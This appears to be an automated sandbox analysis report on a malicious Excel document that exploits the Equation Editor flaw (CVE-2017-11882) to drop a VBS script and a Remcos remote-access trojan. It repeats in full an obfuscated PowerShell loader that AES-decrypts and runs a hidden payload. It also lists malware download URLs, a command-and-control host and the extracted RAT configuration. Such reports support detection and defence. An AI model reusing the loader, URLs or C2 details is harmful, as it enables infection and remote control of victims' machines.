              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1800, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS" , ProcessId: 3336, ProcessName: wscript.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1800, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS" , ProcessId: 3336, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1800, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
              Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49165, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 1800, Protocol: tcp, SourceIp: 188.114.97.3, SourceIsIpv6: false, SourcePort: 80
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1800, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS" , ProcessId: 3336, ProcessName: wscript.exe
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1800, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1536, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3376, TargetFilename: C:\Users\user\AppData\Local\Temp\l1az5pkt.pka.ps1
              No Snort rule has matched
              Timestamp:2024-07-26T08:24:50.462673+0200
              SID:2049038
              Source Port:80
              Destination Port:49171
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-26T08:24:51.617188+0200
              SID:2020424
              Source Port:80
              Destination Port:49172
              Protocol:TCP
              Classtype:Exploit Kit Activity Detected
              Timestamp:2024-07-26T08:24:49.422588+0200
              SID:2047750
              Source Port:80
              Destination Port:49171
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://198.46.176.133/Upload/vbs.jpegAvira URL Cloud: Label: malware
              Source: wemberdag.duckdns.orgAvira URL Cloud: Label: malware
              Source: http://192.227.225.166/36/hb/createdsimplethingstogetbackteachingentirethingsaroundtheworldtogetmebackwiththefreatgreatthings_____________sesheismygirlalwayssheismy.docAvira URL Cloud: Label: malware
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3F1E4F80-4A4D-478E-8570-2CB2A855073D}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\createdsimplethingstogetbackteachingentirethingsaroundtheworldtogetmebackwiththefreatgreatthings_____________sesheismygirlalwayssheismy[1].docAvira: detection malicious, Label: HEUR/Rtf.Malformed
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C63FEFCD.docAvira: detection malicious, Label: HEUR/Rtf.Malformed
              Source: 9.2.powershell.exe.42ed080.0.raw.unpackMalware Configuration Extractor: Remcos {"Version": "5.1.0 Pro", "Host:Port:Password": "wemberdag.duckdns.org:31388:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-LBUX79", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: #U00d6DEME TAVS#U0130YES#U0130.xlsReversingLabs: Detection: 31%
              Source: Yara matchFile source: 9.2.powershell.exe.42ed080.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.powershell.exe.42ed080.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR
              Source: #U00d6DEME TAVS#U0130YES#U0130.xlsJoe Sandbox ML: detected
              Source: powershell.exe, 00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a8541f93-1

              Exploits

              barindex
              Source: Yara matchFile source: 9.2.powershell.exe.42ed080.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.powershell.exe.42ed080.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 192.227.225.166 Port: 80Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
              Source: ~WRF{3F1E4F80-4A4D-478E-8570-2CB2A855073D}.tmp.3.drStream path '_1783465834/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{3F1E4F80-4A4D-478E-8570-2CB2A855073D}.tmp.3.drStream path '_1783465838/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{3F1E4F80-4A4D-478E-8570-2CB2A855073D}.tmp.3.drStream path '_1783465860/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{3F1E4F80-4A4D-478E-8570-2CB2A855073D}.tmp.3.drStream path '_1783465861/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{3F1E4F80-4A4D-478E-8570-2CB2A855073D}.tmp.3.drStream path '_1783465864/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
